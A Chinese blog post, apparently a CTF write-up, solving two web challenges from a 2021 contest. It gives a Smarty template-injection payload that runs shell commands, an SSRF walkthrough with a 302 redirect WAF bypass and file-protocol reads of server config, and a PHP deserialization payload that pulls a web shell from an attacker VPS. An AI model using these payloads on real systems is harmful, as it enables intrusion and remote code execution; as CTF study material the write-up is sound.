

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="cter, web security, red team">
  <meta name="author" content="slug01sh">
  <meta name="keywords" content="生活,安全,编程,英语">
  <title>【CTF系列】2021年2月四叶草CTF - slug01sh&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":1279647913,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>小杰的安全小窝</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/ctf/">
                <i class="iconfont icon-user-fill"></i>
                CTF
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/20210226234032.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="【CTF系列】2021年2月四叶草CTF">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-02-26 23:37" pubdate>
        2021年2月26日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      592 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      8
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">【CTF系列】2021年2月四叶草CTF</h1>
            
            <div class="markdown-body">
              <p>四叶草网络安全学院的一次推广活动吧，正好可以试试自己的水平（问就是菜。</p>
<hr>
<h1 id="1-Web"><a href="#1-Web" class="headerlink" title="1 Web"></a>1 Web</h1><h2 id="1-1-题目：GET"><a href="#1-1-题目：GET" class="headerlink" title="1.1 题目：GET"></a>1.1 题目：GET</h2><blockquote>
<p>题目描述：Hello GET_flAG!!!</p>
<p>题目地址：<a target="_blank" rel="noopener" href="http://0bc68a13.yunyansec.com/">http://0bc68a13.yunyansec.com/</a></p>
</blockquote>
<ol>
<li>根据提示输入任意的Get参数，即可查看源码。<a target="_blank" rel="noopener" href="http://0bc68a13.yunyansec.com/?1">http://0bc68a13.yunyansec.com/?1</a></li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs php"><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">include</span>(<span class="hljs-string">&#x27;flag.php&#x27;</span>);<br><span class="hljs-keyword">include</span>(<span class="hljs-string">&#x27;./libs/Smarty.class.php&#x27;</span>);<br>$smarty = <span class="hljs-keyword">new</span> Smarty();<br><span class="hljs-keyword">if</span>($_GET)&#123;<br>    highlight_file(<span class="hljs-string">&#x27;index.php&#x27;</span>);<br>    <span class="hljs-keyword">foreach</span> ($_GET <span class="hljs-keyword">AS</span> $key =&gt; $value)<br>    &#123;<br>        <span class="hljs-keyword">print</span> $key.<span class="hljs-string">&quot;\n&quot;</span>;<br>        <span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">&quot;/flag/i&quot;</span>, $value))&#123;<br>            <br>            $smarty-&gt;display(<span class="hljs-string">&#x27;./template.html&#x27;</span>);<br><br><br>        &#125;<span class="hljs-keyword">elseif</span>(preg_match(<span class="hljs-string">&quot;/system|exec|eval|cat|assert|file|fgets/i&quot;</span>, $value))&#123;<br><br><br>            $smarty-&gt;display(<span class="hljs-string">&#x27;./template.html&#x27;</span>);            <br>            <br>        &#125;<span class="hljs-keyword">else</span>&#123;<br><br><br>            $smarty-&gt;display(<span class="hljs-string">&quot;eval:&quot;</span>.$value);<span class="hljs-comment">//flag.php</span><br>        &#125;<br>        <br>    &#125;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    $smarty-&gt;display(<span class="hljs-string">&#x27;./template.html&#x27;</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span> <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>
<ol start="2">
<li>查询到smarty是模版注入的漏洞，访问验证漏洞<blockquote>
<p><a target="_blank" rel="noopener" href="http://d40c2bf8.yunyansec.com/?a=%7Bphpinfo()%7D">http://d40c2bf8.yunyansec.com/?a={phpinfo()}</a></p>
</blockquote>
</li>
<li>利用寻找可利用的命令执行函数来查看 flag<blockquote>
<p><a target="_blank" rel="noopener" href="http://938e2c8c.yunyansec.com/?a=%7Bpassthru(%22tac%20%60find%20-iname%20fla*%60%22)%7D">http://938e2c8c.yunyansec.com/?a={passthru(%22tac%20`find%20-iname%20fla*`%22)}</a></p>
</blockquote>
</li>
</ol>
<p><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/92EB4BEA-EA62-4D89-8826-961DF3247500.png" srcset="/img/loading.gif"><br>（图片说明：passthru 函数会执行后面的命令<code>tac `find -iname fla*` </code>，这个命令用来寻找 flag 文件并且输出其内容）</p>
<h2 id="1-2-题目：Website"><a href="#1-2-题目：Website" class="headerlink" title="1.2 题目：Website"></a>1.2 题目：Website</h2><blockquote>
<p>题目描述：Website</p>
<p>附件下载：暂无附件</p>
<p>题目地址：<a target="_blank" rel="noopener" href="http://eb9a2ac6.yunyansec.com/">http://eb9a2ac6.yunyansec.com/</a></p>
</blockquote>
<ol>
<li>猜测为 SSRF，有 WAF，可以使用 302 跳转绕过（可以使用 PHP 实现 302 跳转，使用 nginx 设置太麻烦了）</li>
</ol>
<p><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/50B55344-016F-4009-BB4B-BC63ABC10B7F.png" srcset="/img/loading.gif"></p>
<ol start="2">
<li>使用 File 协议读取配置文件 /etc/httpd/conf/httpd.conf，发现 web 路径（Web1 和 Web2），可以进一步读取网站源码。<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">VirtualHost</span> <span class="hljs-attr">_default_:80</span>&gt;</span><br>DocumentRoot /var/www/html/web1<br><span class="hljs-tag">&lt;/<span class="hljs-name">VirtualHost</span>&gt;</span><br><br><br><span class="hljs-tag">&lt;<span class="hljs-name">VirtualHost</span> *<span class="hljs-attr">:8080</span>&gt;</span><br>    DocumentRoot /var/www/html/web2<br><span class="hljs-tag">&lt;/<span class="hljs-name">VirtualHost</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>php反序列化拿shell，<a target="_blank" rel="noopener" href="http://180fe897.yunyansec.com/?url=http://127.0.0.1:8080?data=payload">http://180fe897.yunyansec.com/?url=http://127.0.0.1:8080?data=payload</a> 在 1.txt 中写入 Web Shell。<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">copy_file</span></span>&#123;<br>    <span class="hljs-keyword">public</span> $path = <span class="hljs-string">&#x27;upload/&#x27;</span>;<br>    <span class="hljs-keyword">public</span> $file=<span class="hljs-string">&quot;e.php&quot;</span>;<br>    <span class="hljs-keyword">public</span> $url=<span class="hljs-string">&#x27;http://127.0.0.1:80/?url=http://vps/1.txt&#x27;</span>;<br><br>&#125;<br><span class="hljs-keyword">echo</span> urlencode(urlencode(serialize(<span class="hljs-keyword">new</span> copy_file())));<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>访问 Web Shell，并找 flag。</li>
</ol>
<p><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/34E3850B-0AB5-43F7-BA48-4FED7BA9CE1B.png" srcset="/img/loading.gif"></p>
<hr>
<h1 id="2-小结"><a href="#2-小结" class="headerlink" title="2 小结"></a>2 小结</h1><p>元宵节前一天的比赛，TimeLineSec 队里的师傅们把题目 AK 了🥳，Cool。</p>
<p>我第一道题是自己完整做出来的，第二道题和队里的师傅稍微讨论了一下，就接近 2 道题的样子。</p>
<p>打 CTF 有半年左右了，但这半年都只是在关注漏洞本身，属于一种只见树木不见森林的状态，希望后面能慢慢的再提升一些核心的技能点。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF/">CTF</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/02/27/2021%E5%B9%B42%E6%9C%8827%E6%97%A5-%E3%80%90CTF%E7%B3%BB%E5%88%97%E3%80%91%E5%B8%B8%E8%A7%81Web%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%BB%A5%E5%8F%8A%E6%90%AD%E5%BB%BA%E7%AE%80%E5%8D%95%E7%8E%AF%E5%A2%83/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">【CTF系列】常见Web漏洞原理以及搭建简单环境</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/02/26/2021%E5%B9%B42%E6%9C%8826%E6%97%A5-%E5%B1%80%E5%9F%9F%E7%BD%91%E4%BC%A0%E8%BE%93%E7%A5%9E%E5%99%A8Snapdrop%EF%BC%88%E7%94%B5%E8%84%91%E3%80%81%E6%89%8B%E6%9C%BA%E5%9D%87%E5%8F%AF%EF%BC%89/">
                        <span class="hidden-mobile">局域网传输神器Snapdrop（电脑、手机均可）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                

              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
    <!-- cnzz Analytics Icon -->
    <span id="cnzz_stat_icon_1279647913" style="display: none"></span>
  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  

  

  

  

  
    <!-- cnzz Analytics -->
    <script defer src="//s4.cnzz.com/z_stat.php?id=1279647913&show=pic"
            type="text/javascript"></script>
  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
